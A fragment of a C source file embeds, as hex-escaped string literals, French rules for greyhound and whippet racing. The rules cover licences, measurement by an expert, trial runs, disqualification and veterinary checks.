+"\x6e\x63\x20\x64\x6f\x74\xe9\x73\x20\x64\x27\x75\x6e\x20\x70\x65" +"\x64\x69\x67\x72\x65\x65\x20\x64\xe9\x66\x69\x6e\x69\x74\x69\x66" +"\x2c\x20\x73\x6f\x6e\x74\x20\x61\x75\x74\x6f\x72\x69\x73\xe9\x73" +"\x20\xe0\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x42\x41\x43" 
+"\x2e\x0d\x44\x61\x6e\x73\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20" +"\x63\x61\x73\x2c\x20\x6f\x6e\x20\x70\x65\x75\x74\x20\x61\x63\x63" +"\x65\x70\x74\x65\x72\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72" +"\x20\x62\x69\x65\x6e\x20\x71\x75\x65\x20\x6c\x65\x20\x20\x70\x65" +"\x64\x69\x67\x72\x65\x65\x20\x6e\x65\x20\x73\x6f\x69\x74\x20\x70" +"\xa3\x73\x20\x61\x72\x72\x69\x76\xe9\x2c\x20\x6d\x61\x69\x73\x20" +"\x6c\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x6e\x65" +"\x20\x73\x65\x72\x6f\x6e\x74\x20\x70\x61\x73\x20\x64\xe9\x6c\x69" +"\x76\x72\xe9\x73\x20\x61\x76\x61\x6e\x74\x20\x72\xe9\x63\x65\x70" +"\x74\x69\x6f\x6e\x20\x64\x75\x20\x70\x65\x64\x69\x67\x72\x65\x65" +"\x2e\x20\x4c\x65\x73\x20\x42\x41\x43\x20\x6e\x65\x20\x70\x65\x75" +"\x76\x65\x6e\x74\x20\x70\x61\x73\x20\xea\x74\x72\x65\x20\x70\x61" +"\x73\x73\xe9\x73\x20\x75\x6e\x20\x6a\x6f\x75\x72\x20\x64\x65\x20" +"\x63\x6f\x75\x72\x73\x65\x2c\x20\x73\x61\x75\x66\x20\x65\x78\x63" +"\x65\x70\x74\x69\x6f\x6e\x73\x20\x70\x72\xe9\x76\x75\x65\x73\x20" +"\x61\x75\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x32" +"\x29\x20\x4c\x27\x65\x78\x70\x65\x72\x74\x2d\x71\x75\x61\x6c\x69" +"\x66\x69\x63\x61\x74\x65\x75\x72\x20\x28\x45\x51\x29\x20\x63\x6f" +"\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x70\x61\x70\x69\x65" +"\x72\x73\x2c\x20\x6c\x65\x20\x74\x61\x74\x6f\x75\x61\x67\x65\x2e" +"\x0d\x50\x6f\x75\x72\x20\x6c\x65\x73\x20\x57\x68\x69\x70\x70\x65" +"\x74\x73\x2c\x20\x69\x6c\x20\x70\xe8\x73\x65\x20\x6c\x65\x20\x63" +"\x68\x69\x65\x6e\x2c\x20\x70\x75\x69\x73\x20\x70\x72\x65\x6e\x64" +"\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x61\x75\x20\x67\x61\x72" +"\x72\x6f\x74\x20\x70\x6f\x75\x72\x20\x72\x65\x74\x65\x6e\x69\x72" +"\x20\x63\x65\x6c\x6c\x65\x20\x64\x75\x20\x6d\x69\x6c\x69\x65\x75" +"\x2c\x20\x6c\x61\x20\x6d\xe9\x64\x69\x61\x6e\x65\x2e\x20\x49\x6c" +"\x20\x70\x65\x75\x74\x20\x61\x75\x73\x73\x69\x20\x66\x61\x69\x72" +"\x65\x20\x70\x61\x73\x73\x65\x72\x20\x6c\x65\x20\x57\x68\x69\x70" 
+"\x70\x65\x74\x20\x73\x6f\x75\x73\x20\x75\x6e\x20\x67\x61\x62\x61" +"\x72\x69\x74\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x2e\x0d\x54\x61" +"\x69\x6c\x6c\x65\x20\x26\x20\x70\x6f\x69\x64\x73\x20\x64\xe9\x74" +"\x65\x72\x6d\x69\x6e\x65\x6e\x74\x20\x6c\x61\x20\x63\x61\x74\xe9" +"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x66\x6f\x72\x6d\x61\x74\x20" +"\x28\x70\x65\x74\x69\x74\x73\x20\x6f\x75\x20\x57\x2c\x20\x20\x67" +"\x72\x61\x6e\x64\x73\x20\x20\x6f\x75\x20\x47\x57\x2c\x20\x74\x72" +"\xe8\x73\x20\x67\x72\x61\x6e\x64\x73\x20\x6f\x75\x20\x54\x47\x57" +"\x29\x2e\x20\x4c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x75" +"\x6c\x74\xe9\x72\x69\x65\x75\x72\x65\x73\x20\x72\x61\x73\x73\x65" +"\x6d\x62\x6c\x65\x72\x6f\x6e\x74\x20\x64\x65\x73\x20\x63\x6f\x6e" +"\x63\x75\x72\x72\x65\x6e\x74\x73\x20\x64\x65\x20\x6d\xea\x6d\x65" +"\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x64\x61\x6e\x73\x20" +"\x63\x68\x61\x71\x75\x65\x20\x73\x65\x78\x65\x2e\x20\x41\x70\x72" +"\xe8\x73\x20\x6c\x27\xe2\x67\x65\x20\x64\x65\x20\x32\x20\x61\x6e" +"\x73\x2c\x20\x75\x6e\x20\x64\x65\x75\x78\x69\xe8\x6d\x65\x20\x63" +"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x73\x65\x72\x61\x20\x6f\x62\x6c" +"\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x20\x45\x6e\x20\x65\x66\x66" +"\x65\x74\x20\x6c\x65\x20\x6d\x65\x73\x75\x72\x61\x67\x65\x20\x64" +"\x65\x20\x6c\x61\x20\x74\x61\x69\x6c\x6c\x65\x20\x65\x73\x74\x20" +"\x64\xe9\x6c\x69\x63\x61\x74\x20\x65\x6e\x20\x66\x6f\x6e\x63\x74" +"\x69\x6f\x6e\x20\x64\x65\x20\x6c\x61\x20\x70\x6f\x73\x69\x74\x69" +"\x6f\x6e\x20\x64\x75\x20\x63\x68\x69\x65\x6e\x2e\x20\x49\x6c\x20" +"\x79\x20\x61\x20\x66\x72\xe9\x71\x75\x65\x6d\x6d\x65\x6e\x74\x20" +"\x75\x6e\x20\xe9\x63\x61\x72\x74\x20\x64\x27\x65\x6e\x76\x69\x72" +"\x6f\x6e\x20\x31\x20\x63\x6d\x20\x65\x6e\x74\x72\x65\x20\x6c\x61" +"\x20\x6d\xe9\x64\x69\x61\x6e\x65\x20\x65\x74\x20\x6c\x65\x73\x20" +"\x6d\x65\x73\x75\x72\x65\x73\x20\x65\x78\x74\x72\xea\x6d\x65\x73" +"\x2e\x20\x41\x76\x61\x6e\x74\x20\x63\x68\x61\x71\x75\x65\x20\x63" 
+"\x6f\x75\x72\x73\x65\x2c\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x70" +"\x85\x75\x74\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x72\x20\x6c\x65" +"\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x63\x68\x61\x6e\x67" +"\x65\x72\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c" +"\x20\x73\x61\x75\x66\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x63\x68" +"\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x6f\xf9\x20\x69\x6c\x20" +"\x66\x61\x69\x74\x20\x75\x6e\x20\x72\x61\x70\x70\x6f\x72\x74\x2e" +"\x0d\x4c\x65\x73\x20\x50\x65\x74\x69\x74\x73\x20\x4c\xe9\x76\x72" +"\x69\x65\x72\x73\x20\x49\x74\x61\x6c\x69\x65\x6e\x73\x20\x64\x6f" +"\x69\x76\x65\x6e\x74\x20\x61\x75\x73\x73\x69\x20\x73\x75\x62\x69" +"\x72\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x6d\x65\x6e" +"\x74\x20\x6c\x65\x73\x20\x39\x20\x74\x6f\x69\x73\x65\x73\x20\x65" +"\x74\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x64\x65" +"\x73\x20\x32\x20\x61\x6e\x73\x2e\x0d\x41\x75\x63\x75\x6e\x20\x6c" +"\xe9\x76\x72\x69\x65\x72\x20\x6e\x92\x65\x73\x74\x20\x61\x75\x74" +"\x6f\x72\x69\x73\xe9\x20\xe0\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69" +"\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f\x66\x66" +"\x69\x63\x69\x65\x6c\x6c\x65\x20\x73\x92\x69\x6c\x20\x64\xe9\x70" +"\x61\x73\x73\x65\x20\x6c\x65\x73\x20\x6e\x6f\x72\x6d\x65\x73\x20" +"\x64\x65\x20\x74\x61\x69\x6c\x6c\x65\x20\x6f\x75\x20\x64\x65\x20" +"\x70\x6f\x69\x64\x73\x20\x69\x6d\x70\x6f\x73\xe9\x65\x73\x20\x70" +"\x61\x72\x20\x6c\x65\x73\x20\x72\xe8\x12\x6c\x65\x6d\x65\x6e\x74" +"\x73\x2e\x0d\x49\x6c\x20\x65\x78\x69\x73\x74\x65\x20\x64\x65\x73" +"\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x73\x20\x64\x65\x20" +"\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x61\x75\x78\x71\x75\x65\x6c" +"\x6c\x65\x73\x20\x76\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20" +"\x64\xe9\x66\xe9\x72\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x57\x68" +"\x69\x70\x70\x65\x74\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x50" +"\x4c\x49\x2c\x20\x6f\x75\x20\x76\x6f\x75\x73\x20\x76\x6f\x69\x72" 
+"\x20\x63\x6f\x6e\x76\x6f\x71\x75\xe9\x20\x63\x61\x72\x20\x69\x6c" +"\x20\x65\x78\x69\x73\x74\x65\x20\x75\x6e\x65\x20\x72\x65\x6c\x61" +"\x74\x69\x6f\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x65\x20\x65\x6e" +"\x74\x72\x65\x20\x66\x6f\x72\x6d\x61\x74\x20\x65\x74\x20\x76\x69" +"\x74\x65\x73\x73\x65\x2e\x20\x4f\x6e\x20\x6e\x65\x20\x66\x61\x69" +"\x74\x20\x70\x61\x73\x20\x63\x6f\x6e\x63\x6f\x75\x72\x69\x72\x20" +"\x64\x65\x73\x20\x70\x6f\x69\x64\x73\x20\x70\x6c\x75\x6d\x65\x73" +"\x20\x63\x6f\x6e\x74\x72\x65\x20\x64\x65\x73\x20\x70\x6f\x69\x64" +"\x73\x20\x6c\x6f\x75\x72\x64\x73\x2e\x20\x44\x65\x70\x75\x69\x73" +"\x20\x6c\x61\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x70\x6c\x61\x63" +"\x65\x20\x64\x75\x20\x73\x79\x73\x74\xe8\x6d\x65\x20\x74\x61\x69" +"\x6c\x6c\x65\x2f\x70\x6f\x69\x64\x73\x20\x69\x6c\x20\x79\x20\x61" +"\x20\x74\x72\xe8\x73\x20\x70\x65\x75\x20\x64\x65\x20\x63\x6f\x6e" +"\x74\x65\x73\x74\x61\x74\x69\x6f\x6e\x73\x20\x61\x75\x20\x6e\x69" +"\x76\x65\x61\x75\x20\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x2e\x20\x4c" +"\x27\x61\x62\x73\x65\x6e\x63\x65\x20\x64\x65\x20\x63\x6f\x6e\x74" +"\x72\xf4\x6c\x65\x73\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f" +"\x6e\x61\x75\x78\x20\x73\x6f\x75\x6c\xe8\x76\x65\x20\x70\x61\x72" +"\x20\x63\x6f\x6e\x74\x72\x65\x20\x62\x69\x65\x6e\x20\x64\x65\x73" +"\x20\x70\x6f\x6c\xe9\x6d\x69\x71\x75\x65\x73\x2e\x0d\x54\x6f\x75" +"\x73\x20\x63\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20" +"\x73\x6f\x6e\x74\x20\x70\x6f\x72\x74\xe9\x73\x20\x73\x75\x72\x20" +"\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x33\x29\x20\x4c\x65" +"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x64\x75\x20\x42\x41" +"\x43\x20\x63\x6f\x6e\x73\x69\x73\x74\x65\x6e\x74\x20\x64\x27\x61" +"\x62\x6f\x72\x64\x20\x65\x6e\x20\x75\x6e\x20\x73\x6f\x6c\x6f\x20" +"\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x65\x72\x20\x6c\x27" +"\x61\x70\x74\x69\x74\x75\x64\x65\x20\xe0\x20\x73\x75\x69\x76\x72" +"\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20\x61\x76\x65\x63" 
+"\x20\x61\x72\x64\x65\x75\x72\x2e\x20\x43\x65\x6c\x61\x20\x73\x75" +"\x66\x66\x69\x74\x20\x70\x6f\x75\x72\x20\x63\x65\x72\x74\x61\x69" +"\x6e\x65\x73\x20\x72\x61\x63\x65\x73\x20\xe0\x20\x66\x61\x69\x62" +"\x6c\x65\x20\x65\x66\x66\x65\x63\x74\x69\x66\x2e\x20\x4c\x65\x73" +"\x20\x57\x68\x69\x70\x70\x65\x74\x73\x20\x64\x6f\x69\x76\x65\x6e" +"\x74\x20\x66\x61\x69\x72\x65\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72" +"\x65\x2c\x20\x32\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x65\x6e\x20" +"\x67\x72\x6f\x75\x70\x65\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x73" +"\x6f\x75\x68\x61\x69\x74\x61\x62\x6c\x65\x20\x71\x75\x65\x20\x6c" +"\x65\x73\x20\x61\x63\x63\x6f\x6d\x70\x61\x67\x6e\x61\x74\x65\x75" +"\x72\x73\x20\x63\x6f\x6d\x70\x72\x65\x6e\x6e\x65\x6e\x74\x20\x64" +"\x65\x73\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x65\x20\x76" +"\x69\x74\x65\x73\x73\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65\x6e" +"\x74\x65\x73\x20\x70\x6f\x75\x72\x20\x65\x6e\x63\x61\x64\x72\x65" +"\x72\x20\x6c\x65\x20\x6e\xe9\x6f\x70\x68\x79\x74\x65\x2e\x20\x41" +"\x20\x63\x68\x61\x71\x75\x65\x20\x76\x69\x72\x61\x67\x65\x20\x69" +"\x6c\x20\x79\x20\x61\x20\x75\x6e\x20\x22\x6f\x62\x73\x65\x72\x76" +"\x61\x74\x65\x75\x72\x22\x2c\x20\x6d\x75\x6e\x69\x20\x64\x27\x75" +"\x6e\x65\x20\x63\x61\x72\x74\x65\x20\x61\x63\x63\x72\xe9\x64\x69" +"\x74\x69\x76\x65\x20\x64\x65\x20\x63\x6f\x6d\x70\xe9\x74\x65\x6e" +"\x63\x65\x2c\x20\x71\x75\x69\x2c\x20\x65\x6e\x20\x63\x61\x73\x20" +"\x64\x27\x69\x6e\x63\x69\x64\x65\x6e\x74\x20\x69\x6e\x66\x6f\x72" +"\x6d\x65\x20\x6c\x27\x65\x78\x70\x65\x72\x74\x2e\x0d\x53\x69\x20" +"\x74\x6f\x75\x74\x20\x73\x27\x65\x73\x74\x20\x62\x69\x65\x6e\x20" +"\x70\x61\x73\x73\xe9\x2c\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76" +"\x72\x69\x65\x72\x20\xd1\x62\x74\x69\x65\x6e\x74\x20\x73\x6f\x6e" +"\x20\x42\x41\x43\x2e\x20\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x75" +"\x6e\x20\x64\x6f\x75\x74\x65\x2c\x20\x69\x6c\x20\x65\x73\x74\x20" +"\x61\x6a\x6f\x75\x72\x6e\xe9\x2c\x20\x73\x27\x69\x6c\x20\x79\x20" 
+"\x61\x20\x66\x61\x75\x74\x65\x20\x69\x6c\x20\x65\x73\x74\x20\x72" +"\x65\x66\x75\x73\xe9\x20\x65\x74\x20\x64\x65\x76\x72\x61\x20\x61" +"\x74\x74\x65\x6e\x64\x72\x65\x20\x31\x20\x6d\x6f\x69\x73\x20\x70" +"\x6f\x75\x72\x20\x73\x65\x20\x72\x65\x70\x72\xe9\x73\x65\x6e\x74" +"\x65\x72\x2e\x20\x56\x6f\x75\x73\x20\x64\x65\x76\x72\x65\x7a\x20" +"\x61\x6c\x6f\x72\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x72\x20" +"\x73\x6f\x6e\x20\x64\x72\x65\x73\x73\x61\x67\x65\x2e\x0d\x4c\x65" +"\x20\x63\x6c\x75\x62\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74" +"\x20\x61\x6c\x6f\x72\x73\x20\x75\x6e\x20\x42\x41\x43\x20\x64\x6f" +"\x6e\x74\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x73\x65\x72\x76\x65" +"\x72\x65\x7a\x20\x70\x72\xe9\x63\x69\x65\x75\x73\x65\x6d\x65\x6e" +"\x74\x20\x6c\x27\x6f\x72\x69\x67\x69\x6e\x61\x6c\x2e\x20\x49\x6c" +"\x20\x65\x73\x74\x20\x69\x6e\x73\x63\x72\x69\x74\x20\x73\x75\x72" +"\x20\x6c\x65\x73\x20\x6e\x6f\x75\x76\x65\x61\x75\x78\x20\x63\x61" +"\x72\x6e\x65\x74\x73\x2e\x0d\x4c\x65\x20\x63\x6c\x75\x62\x20\x76" +"\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\xe9\x67\x61\x6c\x65\x6d" +"\x65\x6e\x74\x20\x75\x6e\x20\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f" +"\x6c\x6f\x72\xe9\x20\x71\x75\x69\x20\x65\x73\x74\x20\x6c\x61\x20" +"\x70\x72\x65\x75\x76\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x70" +"\x61\x63\x69\x74\xe9\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20" +"\x64\x75\x20\x4c\xe9\x76\x72\x69\x65\x72\x2e\x0d\x50\x61\x72\x20" +"\x6c\x61\x20\x73\x75\x69\x74\x65\x2c\x20\x76\x6f\x74\x72\x65\x20" +"\x4c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x61\x62\x61" +"\x6e\x64\x6f\x6e\x6e\x65\x72\x20\x65\x6e\x20\xe9\x70\x72\x65\x75" +"\x76\x65\x2c\x20\x6f\x75\x20\x66\x6c\x6f\x74\x74\x65\x72\x20\x65" +"\x6e\x20\x63\x6f\x75\x72\x73\x65\x2e\x20\x4f\x6e\x20\x64\x69\x74" +"\x20\x71\x75\x27\x69\x6c\x20\x6d\x61\x6e\x71\x75\x65\x20\x64\x27" +"\xe9\x63\x6f\x6c\x61\x67\x65\x2c\x20\x69\x6c\x20\x6e\x27\x65\x73" +"\x74\x20\x70\x61\x73\x20\x61\x73\x73\x65\x7a\x20\x68\x61\x62\x69" 
+"\x74\x75\xe9\x20\xe0\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20" +"\x65\x6e\x20\x67\x72\x6f\x75\x70\x65\x2e\x20\x4f\x6e\x20\x69\x6e" +"\x73\x63\x72\x69\x74\x20\x53\x55\x53\x50\x20\x73\x75\x72\x20\x73" +"\x6f\x6e\x20\x63\x61\x72\x6e\x65\x74\x2e\x0d\x53\x69\x20\x70\x61" +"\x72\x20\x63\x6f\x6e\x74\x72\x65\x20\x69\x6c\x20\x61\x20\x75\x6e" +"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x67\xea" +"\x6e\x61\x6e\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75" +"\x74\x72\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73" +"\x2c\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x73\x71\x75\x61" +"\x6c\x69\x66\x69\xe9\x20\x65\x74\x20\x69\x6e\x74\x65\x72\x64\x69" +"\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20\x70\x65\x6e\x64" +"\x61\x6e\x74\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x34\x20\x73" +"\x65\x6d\x61\x69\x6e\x65\x73\x2e\x20\x43\x65\x6c\x61\x20\x65\x73" +"\x74\x20\x70\x6f\x72\x74\xe9\x20\x73\x75\x72\x20\x6c\x65\x20\x63" +"\x61\x72\x6e\x65\x74\x20\x65\x74\x20\x73\x75\x72\x20\x6c\x65\x20" +"\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f\x6c\x6f\x72\xe9\x2e\x20\x0d" +"\x0d\x44\x6f\x6e\x63\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72" +"\x69\x72\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x33\x20\x64\x6f\x63" +"\x75\x6d\x65\x6e\x74\x73\x20\x3a\x0d\x20\x43\x41\x52\x4e\x45\x54" +"\x20\x2b\x20\x42\x41\x43\x20\x2b\x20\x43\x41\x52\x54\x4f\x4e\x20" +"\x43\x4f\x4c\x4f\x52\x45\x0d\x0d\x4c\x65\x20\x70\x61\x73\x73\x61" +"\x67\x65\x20\x64\x75\x20\x42\x50\x56\x20\x3a\x0d\x4c\x65\x20\x63" +"\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c" +"\x20\x65\x73\x74\x20\x64\xe0\x66\x66\xe9\x72\x65\x6e\x74\x20\x28" +"\x76\x65\x72\x74\x29\x20\x65\x74\x20\x6c\x65\x73\x20\x6d\x6f\x64" +"\x61\x6c\x69\x74\xe9\x73\x20\x64\x65\x20\x71\x75\x61\x6c\x69\x66" +"\x69\x63\x61\x74\x69\x6f\x6e\x20\x73\x6f\x6e\x74\x20\x61\x6e\x61" +"\x6c\x6f\x67\x75\x65\x73\x2c\x20\x6d\x61\x69\x73\x20\x65\x6e\x20" +"\x73\x6f\x6c\x6f\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x70\x6c" 
+"\x65\x2e\x0d\x56\x6f\x75\x73\x20\xea\x74\x65\x73\x20\x64\xe9\x73" +"\x6f\x72\x6d\x61\x69\x73\x20\x70\x72\xea\x74\x20\x70\x6f\x75\x72" +"\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9\x74\x69\x74\x69\x6f\x6e\x2e" +"\x0d\x0d\x51\x75\x65\x20\x64\x65\x76\x65\x7a\x2d\x76\x6f\x75\x73" +"\x20\x73\x61\x76\x6f\x69\x72\x20\x3f\x0d\x54\x6f\x75\x74\x65\x73" +"\x20\x6c\x65\x73\x20\xe9\x76\x65\x6e\x74\x75\x61\x6c\x69\x74\xe9" +"\x73\x20\x73\x6f\x6e\x74\x20\x64\xe9\x63\x72\x69\x74\x65\x73\x20" +"\x65\x6e\x20\x64\xe9\x74\x61\x69\x6c\x20\x64\x61\x6e\x73\x20\x6c" +"\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x64\x65\x73\x20" +"\xe9\x70\x72\x65\x75\x76\x65\x73\x2c\x20\x71\x75\x69\x20\x63\x6f" +"\x6d\x70\x72\x65\x6e\x64\x20\x6c\x65\x73\x20\x72\xe8\x67\x6c\x65" +"\x73\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x69\x76\x65" +"\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65" +"\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20\x45\x2e\x4e\x2e\x43\x2e" +"\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x69" +"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x2c\x20" +"\x20\x70\x6f\x75\x72\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x2e\x0d" +"\x4c\x65\x20\x74\x6f\x75\x74\x20\x66\x61\x69\x74\x20\x65\x6e\x76" +"\x69\x72\x6f\x6e\x20\x35\x30\x20\x70\x61\x67\x65\x73\x20\x65\x74" +"\x20\x6e\x65\x20\x70\x65\x75\x74\x20\x64\x6f\x6e\x63\x20\xea\x74" +"\x72\x65\x20\x64\x69\x66\x66\x75\x73\xe9\x20\xe0\x20\x63\x68\x61" +"\x63\x75\x6e\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20" +"\x64\x27\x61\x62\x6f\x72\x64\x20\x65\x6e\x67\x61\x67\x65\x72\x20" +"\x3a\x0d\x41\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f" +"\x75\x20\x61\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20" +"\x64\x75\x20\x63\x6c\x75\x62\x20\x20\x6f\x72\x67\x61\x6e\x69\x73" +"\x61\x74\x65\x75\x72\x2c\x20\x76\x6f\x75\x73\x20\x65\x6e\x76\x6f" +"\x79\x65\x7a\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20\x6c" +"\x27\x61\x76\x61\x6e\x63\x65\x20\x76\x6f\x74\x72\x65\x20\x65\x6e" 
+"\x67\x61\x67\x65\x6d\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20" +"\x6d\x6f\x64\xe8\x6c\x65\x20\x74\x79\x70\x65\x2c\x20\x6f\x75\x2c" +"\x20\xe0\x20\x64\xe9\x66\x61\x75\x74\x20\x73\x75\x72\x20\x70\x61" +"\x70\x69\x65\x72\x20\x6c\x69\x62\x72\x65\x20\x65\x6e\x20\x72\x65" +"\x63\x6f\x70\x69\x61\x6e\x74\x20\x6c\x65\x20\x42\x41\x43\x2e\x0d" +"\x4c\x65\x73\x20\x74\x61\x72\x69\x66\x73\x20\x73\x6f\x6e\x74\x20" +"\x66\x69\x78\xe9\x73\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x2e\x43" +"\x2e\x43\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20\x76" +"\x6f\x75\x73\x20\x70\x72\xe9\x73\x65\x6e\x74\x65\x72\x20\xe0\x20" +"\x6c\x27\x68\x65\x75\x72\x65\x20\x6f\x69\x78\xe9\x65\x20\x28\x65" +"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x39\x68\x29\x20\x70\x6f" +"\x75\x72\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x76" +"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x2c\x20\x6d\x75\x6e\x69" +"\x20\x64\x27\x75\x6e\x20\x63\x65\x72\x74\x69\x66\x69\x63\x61\x74" +"\x20\x64\x65\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20" +"\x61\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x76\x61\x6c\x69" +"\x64\x65\x2e\x20\x41\x20\x64\xe9\x66\x61\x75\x74\x2c\x20\x76\x6f" +"\x75\x73\x20\x6e\x65\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x70\x61" +"\x73\x20\x70\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x64\xe9\x70" +"\x61\x72\x74\x2e\x0d\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61" +"\x69\x72\x65\x20\x76\xe9\x72\x69\x66\x69\x65\x20\x6c\x65\x73\x20" +"\x70\x61\x70\x69\x65\x72\x73\x2c\x20\x69\x6c\x20\x63\x6f\x6e\x74" +"\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72" +"\x73\x20\x64\x65\x73\x20\x66\x65\x6d\x65\x6c\x6c\x65\x73\x2e\x0d" +"\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x20" +"\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65\x6d" +"\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72\x20" +"\x73\x75\x72\x20\x75\x6e\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65" +"\x2c\x20\x63\x61\x72\x20\x63\x65\x6c\x61\x20\x76\x61\x20\xe9\x6e" 
+"\x65\x72\x76\x65\x72\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72" +"\x72\x65\x6e\x74\x73\x20\x65\x74\x20\x70\x65\x75\x74\x20\x63\x6f" +"\x6e\x64\x75\x69\x72\x65\x20\xe0\x20\x64\x65\x73\x20\x64\x69\x73" +"\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x73\x2e\x0d" +"\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x63" +; +char file_part1[]= +"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x27\xe9\x74\x61\x74\x20\x64" +"\x65\x20\x73\x61\x6e\x74\xe9\x20\x65\x74\x20\x6e\x6f\x74\x61\x6d" +"\x6d\x65\x6e\x74\x20\x63\x65\x6c\x75\x69\x20\x64\x65\x73\x20\x64" +"\x6f\x69\x67\x74\x73\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69\x65" 